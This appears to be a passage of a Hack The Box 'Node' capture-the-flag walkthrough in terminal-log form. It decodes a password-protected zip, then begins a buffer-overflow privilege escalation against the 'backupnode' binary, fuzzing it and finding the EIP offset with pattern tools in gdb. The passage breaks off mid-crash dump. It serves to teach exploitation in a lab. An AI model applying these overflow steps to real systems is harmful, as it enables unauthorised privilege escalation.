u505@kali:~/HTB/Machines/Node$ cat output.b64 UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
u505@kali:~/HTB/Machines/Node$ cat output.b64 | base64 -d > output u505@kali:~/HTB/Machines/Node$ file output output: Zip archive data, at least v?[0x333] to extract
u505@kali:~/HTB/Machines/Node$ mv output output.zip
u505@kali:~/HTB/Machines/Node$ unzip output.zip Archive: output.zip skipping: root.txt need PK compat. v5.1 (can do v4.6)
u505@kali:~/HTB/Machines/Node$ 7z e output.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz (506E3),ASM,AES-NI)
Scanning the drive for archives: 1 file, 1141 bytes (2 KiB)
Extracting archive: output.zip -- Path = output.zip Type = zip Physical Size = 1141

Enter password (will not be echoed): magicword Everything is Ok
Size: 2584 Compressed: 1141

But the file root.txt is a troll face.

u505@kali:~/HTB/Machines/Node$ cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ

Privilege escalation

Buffer overflow

If the folder name is a thousand D, we have a buffer overflow.

u505@kali:~/HTB/Machines/Node$ ./backupnode -a 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python -c "print 'D'*1000"`



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Segmentation fault u505@kali:~/HTB/Machines/Node$ sudo tail -n 2 /var/log/syslog May 20 17:50:29 kali kernel: [101469.038428] backupnode[8790]: segfault at 44444444 ip 0000000044444444 sp 00000000fff77c70 error 14 in libc-2.30.so[f7d3c000+1d000] May 20 17:50:29 kali kernel: [101469.038434] Code: Bad RIP value.

The EIP register has the value 44444444 witch corresponds to DDDD.

Offset determination

The offset determination with embedded peda pattern creator includes not allowed characters.

gdb-peda$ pattern create 1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'

Metasploit pattern generator doesn't use bad characters.

u505@kali:~/HTB/Machines/Node$ /usr/bin/msf-pattern_create -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
u505@kali:~/HTB/Machines/Node$ gdb backupnode
GNU gdb (Debian 9.1-3) 9.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from backupnode... (No debugging symbols found in backupnode) (gdb) init-peda gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B


____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Starting archiving Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x40b EBX: 0xffec7ce0 --> 0x4 ECX: 0x0 EDX: 0x804938b --> 0x712d00 () ESI: 0xf7f7e000 --> 0x1dfd6c EDI: 0xffec7c2f --> 0x796500 () EBP: 0x72413971 ('q9Ar') ESP: 0xffec6c00 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...) EIP: 0x31724130 ('0Ar1') EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x31724130 [------------------------------------stack-------------------------------------] 0000| 0xffec6c00 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...) 0004| 0xffec6c04 ("r3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"...) 0008| 0xffec6c08 ("4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0A"...) 0012| 0xffec6c0c ("Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay"...) 0016| 0xffec6c10 ("r7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3"...) 0020| 0xffec6c14 ("8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4A"...) 0024| 0xffec6c18 